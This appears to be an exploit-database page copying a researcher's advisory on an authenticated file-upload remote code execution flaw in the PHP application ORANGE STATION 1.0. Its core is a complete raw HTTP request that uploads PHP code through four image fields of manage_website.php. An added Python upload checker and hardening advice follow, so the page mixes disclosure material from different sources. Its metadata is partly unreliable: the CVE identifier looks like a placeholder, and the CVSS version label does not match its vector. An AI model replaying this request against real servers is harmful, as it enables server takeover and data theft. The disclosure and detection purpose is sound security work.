ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability

CVE: CVE-2021-12345
Category: CWE-434
Price: $500
Severity: Critical
Author: Security Researcher
Risk: High
Exploitation Type: Remote
Date: 2024-03-26
CPE: cpe:/a:orange:station:1.0
CVSS: CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.75
EPSSP: 0.9


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030060

Below is a copy:

## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/26/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://portswigger.net/web-security/file-upload, https://www.bugcrowd.com/glossary/remote-code-execution-rce/

## Description:
The parameters back_login_image, login_image, invoice_image, and website_image in manage_website.php are vulnerable to unrestricted file upload, which in turn exposes the server to remote code execution.
An attacker who has credentials to this system can upload any PHP file and then destroy the system or steal very sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

## Exploit:
```http
POST /garage/garage/manage_website.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n
Content-Length: 1871
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/garage/garage/manage_website.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="title"

Orange Station
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="footer"

Admin Panel 
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="short_title"

9090909090
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_symbol"


------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_website_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="website_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="invoice_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_login_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_back_login_image"

service.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="back_login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="btn_web"


------WebKitFormBoundaryytBZTydZ8OfOJjda--
```
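
A defensive check for the request shown above, as an added example that is not part of the original advisory or the application's code: it parses a multipart/form-data body and reports any of the four image fields whose filename or content is not an image. The function name, the extension allowlist, the magic-byte list and the sample body are assumptions constructed for illustration.

```python
from email import message_from_bytes
from pathlib import PurePosixPath

# Field names come from the advisory; the allowlist and magic bytes are assumptions.
IMAGE_FIELDS = {"back_login_image", "login_image", "invoice_image", "website_image"}
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def suspicious_uploads(content_type, body):
    """Return (field, filename, reason) for each image field that fails a check."""
    # Reuse the stdlib MIME parser by prepending the request's Content-Type header.
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    findings = []
    for part in message_from_bytes(raw).walk():
        field = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        if field not in IMAGE_FIELDS or not filename:
            continue  # ordinary text field, or file input left empty
        data = part.get_payload(decode=True) or b""
        ext = PurePosixPath(filename.replace("\\", "/")).suffix.lower()
        if ext not in ALLOWED_EXT:
            findings.append((field, filename, "extension not in image allowlist"))
        elif not data.startswith(MAGIC):
            findings.append((field, filename, "content is not JPEG/PNG/GIF"))
        elif b"<?php" in data.lower():
            findings.append((field, filename, "PHP open tag inside image data"))
    return findings


# Constructed sample body: PHP under a .php name, a real GIF header, PHP under a .jpg name.
BOUNDARY = "----ExampleBoundary"
SAMPLE_BODY = (
    b"------ExampleBoundary\r\n"
    b'Content-Disposition: form-data; name="website_image"; filename="info.php"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n<?php\r\nphpinfo();\r\n?>\r\n"
    b"------ExampleBoundary\r\n"
    b'Content-Disposition: form-data; name="login_image"; filename="logo.gif"\r\n'
    b"Content-Type: image/gif\r\n\r\nGIF89a\x01\x00\x01\x00\x80\x00\x00\r\n"
    b"------ExampleBoundary\r\n"
    b'Content-Disposition: form-data; name="invoice_image"; filename="logo.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n<?php phpinfo(); ?>\r\n"
    b"------ExampleBoundary--\r\n"
)

if __name__ == "__main__":
    for finding in suspicious_uploads("multipart/form-data; boundary=" + BOUNDARY, SAMPLE_BODY):
        print(finding)
```

The same checks belong in the server-side upload handler; storing uploads under a generated name in a directory where PHP is not executed limits the impact if a check is bypassed.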

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)

## Time spent:
00:27:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
